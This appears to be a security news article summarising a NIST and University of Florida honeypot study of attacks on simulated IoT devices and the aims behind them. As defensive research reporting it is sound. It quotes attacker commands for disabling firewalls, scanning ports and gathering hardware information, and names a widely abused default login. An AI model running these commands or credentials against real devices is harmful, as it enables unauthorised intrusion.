A three-year honeypot experiment with simulated low-interaction IoT devices of diverse sorts and locations elucidates why actors target particular devices. The honeypot was designed to produce a sufficiently diversified ecosystem and cluster the generated data so that opponents’ aims could be determined.
IoT (Internet of Things) devices, which include tiny internet-connected gadgets like cameras, lights, doorbells, smart TVs, motion sensors, speakers, thermostats, and more, are a burgeoning business. Over 40-billion of these devices are expected to be linked to the Internet by 2025, enabling network entry points or processing capabilities that might be exploited for illegal crypto mining or DDoS swarms.
Server farms, a vetting system, and data collection and processing infrastructure were among the three components of the honeypot ecosystem put up by researchers at NIST and the University of Florida. To construct a varied ecosystem, the researchers used off-the-shelf IoT honeypot emulators Cowrie, Dionaea, KFSensor, and HoneyCamera.
On Censys and Shodan, two specialized search engines discovering internet-connected services, the researchers designed fake instances to look like actual devices. The following were the three primary types of honeypots:
- HoneyShell – Emulating Busybox
- HoneyWindowsBox – Emulating IoT devices running Windows
- HoneyCamera – Emulating various IP cameras from D-Link, Hikvision, and other devices.
The honeypots were changed to adapt to attacker traffic and attack strategies, which was a unique aspect of this experiment. The researcher employed the obtained data to alter the IoT setup and protections, then gathered new data to reflect the actors’ reactions.
The trial yielded data from 22.6 million hits, most of which were directed at the HoneyShell honeypot. The various actors used comparable attack methods because their goals and means of achieving them were identical.
Most actors, for example, use programs like “masscan” to look for open ports and “/etc/init.d/iptables stop” to turn off firewalls. Many actors also execute “free -m,” “lspci grep VGA,” and “cat /proc/cpuinfo,” all of which are aimed at gathering hardware information about the target device.
Interestingly, approximately a million hits were found when the “admin / 1234” username-password combination was checked, indicating that the credentials are overused in IoT devices. In terms of ultimate aims, the HoneyShell and HoneyCamera honeypots were mostly used for DDoS recruiting and were frequently infected with a Mirai version or a coin miner.
Coin miner infections were the most prevalent on the Windows honeypot, followed by viruses, droppers, and trojans. In HoneyCamera’s case, the researchers created a vulnerability to reveal credentials and discovered that 29 individuals manually exploited the weakness.
“Only 314 112 (13 %) unique sessions were detected with at least one successful command execution inside the honeypots,” clarifies the research paper. “This result indicates that only a small portion of the attacks executed their next step, and the rest (87 %) solely tried to find the correct username/password combination.”